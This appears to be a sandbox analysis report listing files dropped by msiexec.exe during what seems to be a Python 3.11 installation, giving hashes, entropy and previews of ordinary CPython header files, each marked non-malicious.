                                                                                                                                SSDEEP:192:YFlH80GStnohOWle/cz6PW0wy4rS5oBSrDFHRGZg9+z4h/hT0ONB:YjHjtnohOrcq4rSbnT0ONB
                                                                                                                                MD5:E7217DF44BDEB7CD51C4F987BF410A2C
                                                                                                                                SHA1:A9CE09B4F1D317CECB2F7740BD041E5A798F2214
                                                                                                                                SHA-256:CE89AFD0B06D582CC908350AB6DC617698CDC58B9B2FB30F5B7B3FE002D981A1
                                                                                                                                SHA-512:D351C2ECC21D7211DCE060E90FD5B0F0C475263BDA1259AC6EE8EC560C62FD22AE4A7D788E4DDBFAFD7A4E6B7E45FC0CF9CDCD514595DA47260AAFAFF7BE9A43
                                                                                                                                Malicious:false
                                                                                                                                Preview:// Auto-generated by Tools/scripts/generate_opcode_h.py from Lib/opcode.py....#ifndef Py_OPCODE_H..#define Py_OPCODE_H..#ifdef __cplusplus..extern "C" {..#endif....../* Instruction opcodes for compiled code */..#define CACHE 0..#define POP_TOP 1..#define PUSH_NULL 2..#define NOP 9..#define UNARY_POSITIVE 10..#define UNARY_NEGATIVE 11..#define UNARY_NOT 12..#define UNARY_INVERT 15..#define BINARY_SUBSCR 25..#define GET_LEN 30..#define MATCH_MAPPING 31..#define MATCH_SEQUENCE 32..#define MATCH_KEYS 33..#define PUSH_EXC_INFO 35..#define CHECK_EXC_MATCH 36..#define C
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):788
                                                                                                                                Entropy (8bit):5.107607896657543
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:BtvUuvCftviGkECQTCMs/ERIAqJOAGIXoTlD43KMQXNeBYrz0qiv9:3UkAtviGZMdPOBIX0iQ9oq49
                                                                                                                                MD5:E39ACD45EAACDCFD5AFA071B7DC90AC1
                                                                                                                                SHA1:2CF9EA045A02CFD396B9923D232BE5ED10EE29B0
                                                                                                                                SHA-256:A32FD8D498C342B0263917A1CCADFF7A8D7CADC9B7DC711C822BFA3EC756893B
                                                                                                                                SHA-512:9BF096FCCE75361836EBDFD398815B1D00CB2D547C964D653FB6F66042F10137F950E74D66E02FC12BB80897BE9A9DC5C6D1780EBAAC0CD6ECDE91E9AB481A0E
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_OSDEFS_H..#define Py_OSDEFS_H..#ifdef __cplusplus..extern "C" {..#endif....../* Operating system dependencies */....#ifdef MS_WINDOWS..#define SEP L'\\'..#define ALTSEP L'/'..#define MAXPATHLEN 256..#define DELIM L';'..#endif....#ifdef __VXWORKS__..#define DELIM L';'..#endif..../* Filename separator */..#ifndef SEP..#define SEP L'/'..#endif..../* Max pathname length */..#ifdef __hpux..#include <sys/param.h>..#include <limits.h>..#ifndef PATH_MAX..#define PATH_MAX MAXPATHLEN..#endif..#endif....#ifndef MAXPATHLEN..#if defined(PATH_MAX) && PATH_MAX > 1024..#define MAXPATHLEN PATH_MAX..#else..#define MAXPATHLEN 1024..#endif..#endif..../* Search path entry delimiter */..#ifndef DELIM..#define DELIM L':'..#endif....#ifdef __cplusplus..}..#endif..#endif /* !Py_OSDEFS_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):308
                                                                                                                                Entropy (8bit):5.291311183124595
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:WvlKoqrN7pRAQ0ho7p2jQ6z7Ci0Ns2L/syeWFsjQ6dn67pnzv:ikrN70m7imN9dnagVD
                                                                                                                                MD5:BCB8EBA549031E5DD8F15AED24297EB3
                                                                                                                                SHA1:345FB6F92D32A64C9DB763B96C441BF6218FB582
                                                                                                                                SHA-256:C3CF9EB8D709F9032E86E9ECEFDF2A26FDFCF5F3A0AFB6C3A1B470E8E97D6A0B
                                                                                                                                SHA-512:248EBD66940733898B64CA1B16977132F4868FD7CF04EEAA782845AB9A42BBEF27A237410B3AF111DC973D7C6CABA12983DCEA85909E2DFA03274AF617DC9123
                                                                                                                                Malicious:false
                                                                                                                                Preview:../* os module interface */....#ifndef Py_OSMODULE_H..#define Py_OSMODULE_H..#ifdef __cplusplus..extern "C" {..#endif....#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03060000..PyAPI_FUNC(PyObject *) PyOS_FSPath(PyObject *path);..#endif....#ifdef __cplusplus..}..#endif..#endif /* !Py_OSMODULE_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1334
                                                                                                                                Entropy (8bit):4.916598081170381
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:jq364gF3BJL+4lx+SGIGpUX8YvHqke+I0UUrucuFwN3PWke:jqbg5/4IIUMYvKktTUPcwwBPWke
                                                                                                                                MD5:98EA8804DD9EE8F9893C4156CFBD5622
                                                                                                                                SHA1:657DB800597ED316DE1971F81406FA478A9E4359
                                                                                                                                SHA-256:BB09909020C76721D4865A286B306B1E350D47FC8BFBA4368DCEFFCD658CFC53
                                                                                                                                SHA-512:99FD45260BD1B468597D8AD04B8A6B52BB4C1D688E0B4E87E8F8F5AF7B095948DEF1227CD69078E840E4108544D10FC1F381306E8BFA04FAD0608E572FC9E09B
                                                                                                                                Malicious:false
                                                                                                                                Preview:../* Python version identification scheme..... When the major or minor version changes, the VERSION variable in.. configure.ac must also be changed..... There is also (independent) API version information in modsupport.h...*/..../* Values for PY_RELEASE_LEVEL */..#define PY_RELEASE_LEVEL_ALPHA 0xA..#define PY_RELEASE_LEVEL_BETA 0xB..#define PY_RELEASE_LEVEL_GAMMA 0xC /* For release candidates */..#define PY_RELEASE_LEVEL_FINAL 0xF /* Serial should be 0 here */.. /* Higher for patch releases */..../* Version parsed out into numeric values */../*--start constants--*/..#define PY_MAJOR_VERSION 3..#define PY_MINOR_VERSION 11..#define PY_MICRO_VERSION 0..#define PY_RELEASE_LEVEL PY_RELEASE_LEVEL_FINAL..#define PY_RELEASE_SERIAL 0..../* Version as a string */..#define PY_VERSION "3.11.0"../*--end constants--*/..../* Version as a single 4-byte hex number, e.g. 0x010502B2 == 1.5.2b2... Us
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2570
                                                                                                                                Entropy (8bit):5.3621620647970785
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:q+qVG7WouOuRJjKmA3BrJ20ERBGIMjqIZ:q+qVGqoHeKx3n2/BGIM1
                                                                                                                                MD5:D903E125C9DD4FFF0A6C995CB1067F7F
                                                                                                                                SHA1:0D51B920BC439F58788C82C981D8D6FF94D1E291
                                                                                                                                SHA-256:E30D3C5ABBF225EF9B8BDDBCC371A23A14F8510768621E3196FBBCE14C09F49A
                                                                                                                                SHA-512:184A27C4B708DC1CDE41F7F6FD68097DF2EA5CB6CC95CB1F8C72034F21CAB6A706AB00EB8EE8B4C25BBC5D9105D554EC7728F1C8BD2EC82255BA88D689BC8194
                                                                                                                                Malicious:false
                                                                                                                                Preview:..#ifndef Py_CURSES_H..#define Py_CURSES_H....#ifdef __APPLE__../*..** On Mac OS X 10.2 [n]curses.h and stdlib.h use different guards..** against multiple definition of wchar_t...*/..#ifdef _BSD_WCHAR_T_DEFINED_..#define _WCHAR_T..#endif..#endif /* __APPLE__ */..../* On FreeBSD, [n]curses.h and stdlib.h/wchar.h use different guards.. against multiple definition of wchar_t and wint_t. */..#if defined(__FreeBSD__) && defined(_XOPEN_SOURCE_EXTENDED)..# ifndef __wchar_t..# define __wchar_t..# endif..# ifndef __wint_t..# define __wint_t..# endif..#endif....#if !defined(HAVE_CURSES_IS_PAD) && defined(WINDOW_HAS_FLAGS)../* The following definition is necessary for ncurses 5.7; without it,.. some of [n]curses.h set NCURSES_OPAQUE to 1, and then Python.. can't get at the WINDOW flags field. */..#define NCURSES_OPAQUE 0..#endif....#ifdef HAVE_NCURSES_H..#include <ncurses.h>..#else..#include <curses.h>..#endif....#ifdef HAVE_NCURSES_H../* configure was checking <curses.h>, but we will..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5257
                                                                                                                                Entropy (8bit):5.062758599734267
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:JdD1EclzgKD6oIeeBmM7n7K51XNHUmjiE7xC8be8kskBP2u:JdhN0K2oTEF7KrXZUMiEwP2u
                                                                                                                                MD5:1A571253C83E5854445D1C7C0C351B1B
                                                                                                                                SHA1:A457BEE881613486C37C9396BAFD7A0F74AA7BE2
                                                                                                                                SHA-256:E79DC84F5367F99B4D6B6FC3806EF0341052EFC384D1F2C9485B5598C457CDB9
                                                                                                                                SHA-512:4105BC00A05CD1221E0F8EA3B23BC77975A94B77416E45A8C496252511B710BB4469D79867C30492288552C1DAA5BBD02409037729975CD3FEF6F7BD442F9516
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Public Py_buffer API */....#ifndef Py_BUFFER_H..#define Py_BUFFER_H..#ifdef __cplusplus..extern "C" {..#endif....#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x030b0000..../* === New Buffer API ============================================.. * Limited API and stable ABI since Python 3.11.. *.. * Py_buffer struct layout and size is now part of the stable abi3. The.. * struct layout and size must not be changed in any way, as it would.. * break the ABI... *.. */....typedef struct {.. void *buf;.. PyObject *obj; /* owned reference */.. Py_ssize_t len;.. Py_ssize_t itemsize; /* This is Py_ssize_t so it can be.. pointed to by strides in simple case.*/.. int readonly;.. int ndim;.. char *format;.. Py_ssize_t *shape;.. Py_ssize_t *strides;.. Py_ssize_t *suboffsets;.. void *internal;..} Py_buffer;..../* Return 1 if the getbuffer function is available, otherwise return 0. */..PyAPI_FUNC(int) PyObject_CheckBuffer(PyObj
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1784
                                                                                                                                Entropy (8bit):5.08046872030992
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:g2KeaX90KvX+L1qRdj3jT9C3dbWbA6GkK6ey+v8iD5bJ7qK3DilPnGIfyQDD:g2Kl908+85tDb5pK7n4KqKY
                                                                                                                                MD5:54A50D33250DF99F315A6EC7D1288A44
                                                                                                                                SHA1:6710F3ABE7B7A88BDD899E232E03F59F3CE2E9E8
                                                                                                                                SHA-256:7AB4FED74391638392884905F8F0249222FB964B1674DF17EBC46F867E45EE62
                                                                                                                                SHA-512:C08C021517D096184C9A6376B4BF2D27E1CF5B6504827E2599D0DE89635AEA48ACB5033897A5A9513B21DE5364E7EB88AD273DBCECC5ABF5F1334FDD0B9A453C
                                                                                                                                Malicious:false
                                                                                                                                Preview:../* Capsule objects let you wrap a C "void *" pointer in a Python.. object. They're a way of passing data through the Python interpreter.. without creating your own custom type..... Capsules are used for communication between extension modules... They provide a way for an extension module to export a C interface.. to other extension modules, so that extension modules can use the.. Python import mechanism to link to one another..... For more information, please see "c-api/capsule.html" in the.. documentation...*/....#ifndef Py_CAPSULE_H..#define Py_CAPSULE_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PyCapsule_Type;....typedef void (*PyCapsule_Destructor)(PyObject *);....#define PyCapsule_CheckExact(op) Py_IS_TYPE(op, &PyCapsule_Type)......PyAPI_FUNC(PyObject *) PyCapsule_New(.. void *pointer,.. const char *name,.. PyCapsule_Destructor destructor);....PyAPI_FUNC(void *) PyCapsule_GetPointer(PyObject *capsule, const char *name);....Py
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):21730
                                                                                                                                Entropy (8bit):5.314297182500726
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:rG3DApgNAkHR+4C8URrJz8f/8BsRV4igeahkJ42zgsdgTaXxHClV:rG3DApTVRF8cSEAas9kXGClV
                                                                                                                                MD5:4D7B0E3358E563D61C1754375DC4957C
                                                                                                                                SHA1:F726E1F27412C8E8DB968A59C140A67189AF9952
                                                                                                                                SHA-256:4836DC81B8668B6AA164C5E101FF1B4701B43A3A8E0B2AEEC9F3BDC8602CC914
                                                                                                                                SHA-512:82C2DF49687746E846D97A8A40EDDF37591ABDBDB1018A57193779EC33AB35A74987932C7AAE36E01943BA39F84DF08564F5E1210FF4403A264F524F2244B478
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CONFIG_H..#define Py_CONFIG_H..../* pyconfig.h. NOT Generated automatically by configure.....This is a manually maintained version used for the Watcom,..Borland and Microsoft Visual C++ compilers. It is a..standard part of the Python distribution.....WINDOWS DEFINES:..The code specific to Windows should be wrapped around one of..the following #defines....MS_WIN64 - Code specific to the MS Win64 API..MS_WIN32 - Code specific to the MS Win32 (and Win64) API (obsolete, this covers all supported APIs)..MS_WINDOWS - Code specific to Windows, but all versions...Py_ENABLE_SHARED - Code if the Python core is built as a DLL.....Also note that neither "_M_IX86" or "_MSC_VER" should be used for..any purpose other than "Windows Intel x86 specific" and "Microsoft..compiler specific". Therefore, these should be very rare.......NOTE: The following symbols are deprecated:..NT, USE_DL_EXPORT, USE_DL_IMPORT, DL_EXPORT, DL_IMPORT..MS_CORE_DLL.....WIN32 is still required for the locale modul
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2472
                                                                                                                                Entropy (8bit):5.248593995040242
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:qK+wYVJPTFJppO6ycfrO1KPoACIyIPRZP8jp:qK+weTfpgI60POI7f8F
                                                                                                                                MD5:09806638F331A606C65AE3EDB7772375
                                                                                                                                SHA1:3D0E84296C4CD70E6C40E95F4B4612A236DBD292
                                                                                                                                SHA-256:2F3386F6AABDE0C9A5504A5424E5B42E969744E1692F636D16A009B024F440DA
                                                                                                                                SHA-512:6D09DCAAD4B5C50EE87080427B5CEC740494B692A50FCCFE2025DDF618D18CE7B33732428B30CA8B1F828C16FFD6732465AE80F528352373803500B1C316C3AB
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Static DTrace probes interface */....#ifndef Py_DTRACE_H..#define Py_DTRACE_H..#ifdef __cplusplus..extern "C" {..#endif....#ifdef WITH_DTRACE....#include "pydtrace_probes.h"..../* pydtrace_probes.h, on systems with DTrace, is auto-generated to include.. `PyDTrace_{PROBE}` and `PyDTrace_{PROBE}_ENABLED()` macros for every probe.. defined in pydtrace_provider.d..... Calling these functions must be guarded by a `PyDTrace_{PROBE}_ENABLED()`.. check to minimize performance impact when probing is off. For example:.... if (PyDTrace_FUNCTION_ENTRY_ENABLED()).. PyDTrace_FUNCTION_ENTRY(f);..*/....#else..../* Without DTrace, compile to nothing. */....static inline void PyDTrace_LINE(const char *arg0, const char *arg1, int arg2) {}..static inline void PyDTrace_FUNCTION_ENTRY(const char *arg0, const char *arg1, int arg2) {}..static inline void PyDTrace_FUNCTION_RETURN(const char *arg0, const char *arg1, int arg2) {}..static inline void PyDTrace_GC_START(int arg0) {}..sta
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13113
                                                                                                                                Entropy (8bit):5.2545082530506875
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:JoQHYn4jvkiu5HDwuWaFwxQB3mzOFPMkYk7Tvsdh1ip4iDHIPw/CpGCiPYHC8m5U:lHvjvJu5HDNsTo0GfwhUZoP9fZv3AJ9Q
                                                                                                                                MD5:E76F0FEC7A52A6A8CF7E5D1EF8CFE1A9
                                                                                                                                SHA1:E75BCDB2BBA29C42DCA790AFA9419E75D654D98D
                                                                                                                                SHA-256:6EEBED4134B80C760290F9F508969B9B2CFAF43528843BDD2FF53DDC70613A74
                                                                                                                                SHA-512:4DB37D43F4D102F1EC76EB595058627FA7BD9AC162E01E8E2FDDB0E781EE15A18CA1B8A50FE5ED6E3F8B733BDF779A62045D367BD805ECC82ACB860FAA3BB4B7
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_ERRORS_H..#define Py_ERRORS_H..#ifdef __cplusplus..extern "C" {..#endif....#include <stdarg.h> // va_list..../* Error handling definitions */....PyAPI_FUNC(void) PyErr_SetNone(PyObject *);..PyAPI_FUNC(void) PyErr_SetObject(PyObject *, PyObject *);..PyAPI_FUNC(void) PyErr_SetString(.. PyObject *exception,.. const char *string /* decoded from utf-8 */.. );..PyAPI_FUNC(PyObject *) PyErr_Occurred(void);..PyAPI_FUNC(void) PyErr_Clear(void);..PyAPI_FUNC(void) PyErr_Fetch(PyObject **, PyObject **, PyObject **);..PyAPI_FUNC(void) PyErr_Restore(PyObject *, PyObject *, PyObject *);..#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x030b0000..PyAPI_FUNC(PyObject*) PyErr_GetHandledException(void);..PyAPI_FUNC(void) PyErr_SetHandledException(PyObject *);..#endif..#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03030000..PyAPI_FUNC(void) PyErr_GetExcInfo(PyObject **, PyObject **, PyObject **);..PyAPI_FUNC(void) PyErr_SetExcInfo(PyObject *, PyObject *, Py
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2505
                                                                                                                                Entropy (8bit):4.907917178642672
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:Ia2teebxzfQAikOlXixVXLVXLVgbAmV7ZUFHgHYl6wPPDDw3E1f0BP+D3dTEV:Ia2tjbxzoAnIixVXLVXLVgbVV7ZUFHgD
                                                                                                                                MD5:9DC3AC8C1CEE9EFF2A709E83EC4CA515
                                                                                                                                SHA1:97454FA534DE3CBBD32062D18293A78A62DFE378
                                                                                                                                SHA-256:51E73F1874322331D8D145AEF37610319271C024C36D65921EA52BFDA7B70DF0
                                                                                                                                SHA-512:E0E7CC958BC6A66BC8D65B55A4E1452D2A22DD3BC7EBA21B75F01F563929163281DA4A700122FCE7DBAEC8AF749A1EC550BFD41910E055A75AC3152845FC7354
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Stuff to export relevant 'expat' entry points from pyexpat to other.. * parser modules, such as cElementTree. */..../* note: you must import expat.h before importing this module! */....#define PyExpat_CAPI_MAGIC "pyexpat.expat_CAPI 1.1"..#define PyExpat_CAPSULE_NAME "pyexpat.expat_CAPI"....struct PyExpat_CAPI..{.. char* magic; /* set to PyExpat_CAPI_MAGIC */.. int size; /* set to sizeof(struct PyExpat_CAPI) */.. int MAJOR_VERSION;.. int MINOR_VERSION;.. int MICRO_VERSION;.. /* pointers to selected expat functions. add new functions at.. the end, if needed */.. const XML_LChar * (*ErrorString)(enum XML_Error code);.. enum XML_Error (*GetErrorCode)(XML_Parser parser);.. XML_Size (*GetErrorColumnNumber)(XML_Parser parser);.. XML_Size (*GetErrorLineNumber)(XML_Parser parser);.. enum XML_Status (*Parse)(.. XML_Parser parser, const char *s, int len, int isFinal);.. XML_Parser (*ParserCreate_MM)(.. const XML_Char *encoding, const XM
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):577
                                                                                                                                Entropy (8bit):5.189767002122922
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:UtruhGFsD6klSrekTAQ0ysjQ6zbyOPD+STc9yeMeoryeWDl76rCJs0fjAkVjBDji:UxuQsArejPjD+STlgnh2rCJ78cjB9U
                                                                                                                                MD5:1A369280A69D2A590919E676B7912DB1
                                                                                                                                SHA1:13F6860E51BB021D20CD0F38A800BB814B59FCF1
                                                                                                                                SHA-256:F9BF8550E78682111C980DBE556B7337FD6C23CF99C2B604180A59161B1ACE6A
                                                                                                                                SHA-512:38027C77D374762F37310F5969EDA596F4872F85265E66207BC9A0C9FCACC29449D27EC14E06DE91227EADADFE98A7EE2C999CA2A3B51B7C5C4C0B20E0F0090B
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Limited C API of PyFrame API.. *.. * Include "frameobject.h" to get the PyFrameObject structure... */....#ifndef Py_PYFRAME_H..#define Py_PYFRAME_H..#ifdef __cplusplus..extern "C" {..#endif..../* Return the line of code the frame is currently executing. */..PyAPI_FUNC(int) PyFrame_GetLineNumber(PyFrameObject *);....PyAPI_FUNC(PyCodeObject *) PyFrame_GetCode(PyFrameObject *frame);....#ifndef Py_LIMITED_API..# define Py_CPYTHON_PYFRAME_H..# include "cpython/pyframe.h"..# undef Py_CPYTHON_PYFRAME_H..#endif....#ifdef __cplusplus..}..#endif..#endif /* !Py_PYFRAME_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4298
                                                                                                                                Entropy (8bit):5.254023686902442
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:TG4eHjbX5FEjFgiuKrCXYz7jdRjyDyt1719VNVUVHQVyd+m1LnJGLIdMJoqdzjAB:Sp4SmC235J1cKm78IdgoujAujrc
                                                                                                                                MD5:DA7C6D806C3D7784C30B42440D1A89DA
                                                                                                                                SHA1:DAB6510FE6A9490CD897D17F89782872C78AA55F
                                                                                                                                SHA-256:12E61F600B74A9ED310684AEEE1D90FC18ACBDA7996E5C33942E2CD610491E8B
                                                                                                                                SHA-512:5E2C9EA659FA04304E484CCB3720D4B864D6DAF87DA57F489EF79AC73C5C33943B23C0D18B30E2E15919946B7C25D7A3C5C0C58DC43FB03C14E278E163986BC4
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_HASH_H....#define Py_HASH_H..#ifdef __cplusplus..extern "C" {..#endif..../* Helpers for hash functions */..#ifndef Py_LIMITED_API..PyAPI_FUNC(Py_hash_t) _Py_HashDouble(PyObject *, double);..PyAPI_FUNC(Py_hash_t) _Py_HashPointer(const void*);..// Similar to _Py_HashPointer(), but don't replace -1 with -2..PyAPI_FUNC(Py_hash_t) _Py_HashPointerRaw(const void*);..PyAPI_FUNC(Py_hash_t) _Py_HashBytes(const void*, Py_ssize_t);..#endif..../* Prime multiplier used in string and various other hashes. */..#define _PyHASH_MULTIPLIER 1000003UL /* 0xf4243 */..../* Parameters used for the numeric hash implementation. See notes for.. _Py_HashDouble in Python/pyhash.c. Numeric hashes are based on.. reduction modulo the prime 2**_PyHASH_BITS - 1. */....#if SIZEOF_VOID_P >= 8..# define _PyHASH_BITS 61..#else..# define _PyHASH_BITS 31..#endif....#define _PyHASH_MODULUS (((size_t)1 << _PyHASH_BITS) - 1)..#define _PyHASH_INF 314159..#define _PyHASH_IMAG _PyHASH_MULTIPLIER....../* hash se
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2327
                                                                                                                                Entropy (8bit):5.380690029352174
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:lXVNiHDyL8YRcAw9viniJtNtVD/XPrtPkYk:lFVL8YRcY2XjJk
                                                                                                                                MD5:A4999224788D89737D77C793066AF45A
                                                                                                                                SHA1:B0A93D35B1C5198701CC034A30E2601014C14A14
                                                                                                                                SHA-256:DAE21F8FA25D4B71D195EF2F0A4E079B523BACE866025883158BB6CF2A765E37
                                                                                                                                SHA-512:A4B4A0567878907FECD94A754BAE9B00E1F3D6B69891DE5C9976F106DC26D83961C04856C24BCFA1BC347C542A3AC2AA4AA012B3C7C77F6DC7D0E747470CC6FA
                                                                                                                                Malicious:false
                                                                                                                                Preview:../* Interfaces to configure, query, create & destroy the Python runtime */....#ifndef Py_PYLIFECYCLE_H..#define Py_PYLIFECYCLE_H..#ifdef __cplusplus..extern "C" {..#endif....../* Initialization and finalization */..PyAPI_FUNC(void) Py_Initialize(void);..PyAPI_FUNC(void) Py_InitializeEx(int);..PyAPI_FUNC(void) Py_Finalize(void);..#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03060000..PyAPI_FUNC(int) Py_FinalizeEx(void);..#endif..PyAPI_FUNC(int) Py_IsInitialized(void);..../* Subinterpreter support */..PyAPI_FUNC(PyThreadState *) Py_NewInterpreter(void);..PyAPI_FUNC(void) Py_EndInterpreter(PyThreadState *);....../* Py_PyAtExit is for the atexit module, Py_AtExit is for low-level.. * exit functions... */..PyAPI_FUNC(int) Py_AtExit(void (*func)(void));....PyAPI_FUNC(void) _Py_NO_RETURN Py_Exit(int);..../* Bootstrap __main__ (defined in Modules/main.c) */..PyAPI_FUNC(int) Py_Main(int argc, wchar_t **argv);..PyAPI_FUNC(int) Py_BytesMain(int argc, char **argv);..../* In pathconfig.c
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3091
                                                                                                                                Entropy (8bit):4.852982963563458
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:qkIe4oF8a8a+dxBn9S3jGJcLRD4vn3bknA:qbe4oF55yxBn6QPAnA
                                                                                                                                MD5:87B0AE703BE59E794AC4370A2BE4C188
                                                                                                                                SHA1:79DB18A44B9E65B2FD41D27668802E9332F0683C
                                                                                                                                SHA-256:639BD1803F57A4A1293B72905A904BE08553FF9CD040EE7B23BE41D90E4CBDCF
                                                                                                                                SHA-512:7E9C9AFC90FAB732FC0B5F58589F50BA980CC4F61AF60F35FFFC10EB49598E8B2663D65705FB28A7B76AB413EB5E764E09B9B52679F7CC276AC17F5422ABD865
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef PYMACCONFIG_H..#define PYMACCONFIG_H.. /*.. * This file moves some of the autoconf magic to compile-time.. * when building on MacOSX. This is needed for building 4-way.. * universal binaries and for 64-bit universal binaries because.. * the values redefined below aren't configure-time constant but.. * only compile-time constant in these scenarios... */....#if defined(__APPLE__)....# undef SIZEOF_LONG..# undef SIZEOF_PTHREAD_T..# undef SIZEOF_SIZE_T..# undef SIZEOF_TIME_T..# undef SIZEOF_VOID_P..# undef SIZEOF__BOOL..# undef SIZEOF_UINTPTR_T..# undef SIZEOF_PTHREAD_T..# undef WORDS_BIGENDIAN..# undef DOUBLE_IS_ARM_MIXED_ENDIAN_IEEE754..# undef DOUBLE_IS_BIG_ENDIAN_IEEE754..# undef DOUBLE_IS_LITTLE_ENDIAN_IEEE754..# undef HAVE_GCC_ASM_FOR_X87....# undef VA_LIST_IS_ARRAY..# if defined(__LP64__) && defined(__x86_64__)..# define VA_LIST_IS_ARRAY 1..# endif....# undef HAVE_LARGEFILE_SUPPORT..# ifndef __LP64__..# define H
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6114
                                                                                                                                Entropy (8bit):5.280080217987115
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:d+5ikwYsjYLgGxKTdNLsTwrKmUMKPU94D6+SH8Up0SbFJ8kTQNgmG8pfdNq6M3ZI:45ikwYWTBmp28UPbFJlF8pfdknMx8bUL
                                                                                                                                MD5:52E44F834C1596A4A72DB47103E64884
                                                                                                                                SHA1:8024871E273748ACC9C5BD63AF20CC4704039CE5
                                                                                                                                SHA-256:C747C871AA76EC526A11971BD66BDA17A7733F69C8AF112370CA94279E8D80C8
                                                                                                                                SHA-512:7B1C62E545387709F4F4D1C307FC8BE4D6F16E4D492C39DB5E835E9F42BCAB5093F7BE4347B4E296B0C3C97261EC0CE683AFF00844A9C3D7A61548F7475E6424
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_PYMACRO_H..#define Py_PYMACRO_H....// gh-91782: On FreeBSD 12, if the _POSIX_C_SOURCE and _XOPEN_SOURCE macros are..// defined, <sys/cdefs.h> disables C11 support and <assert.h> does not define..// the static_assert() macro. Define the static_assert() macro in Python until..// <sys/cdefs.h> suports C11:..// https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=255290..#if defined(__FreeBSD__) && !defined(static_assert)..# define static_assert _Static_assert..#endif....// static_assert is defined in glibc from version 2.16. Before it requires..// compiler support (gcc >= 4.6) and is called _Static_assert...// In C++ 11 static_assert is a keyword, redefining is undefined behaviour...#if (defined(__GLIBC__) \.. && (__GLIBC__ < 2 || (__GLIBC__ == 2 && __GLIBC_MINOR__ <= 16)) \.. && !(defined(__cplusplus) && __cplusplus >= 201103L) \.. && !defined(static_assert))..# define static_assert _Static_assert..#endif..../* Minimum value between x and y */..#define Py_MIN(x, y)
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2044
                                                                                                                                Entropy (8bit):5.324703100734168
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:oPZTUcnUD6+IH+vo9WvMNqY+uzKmVAuNhUELuH:oPZTwIa/LCIN
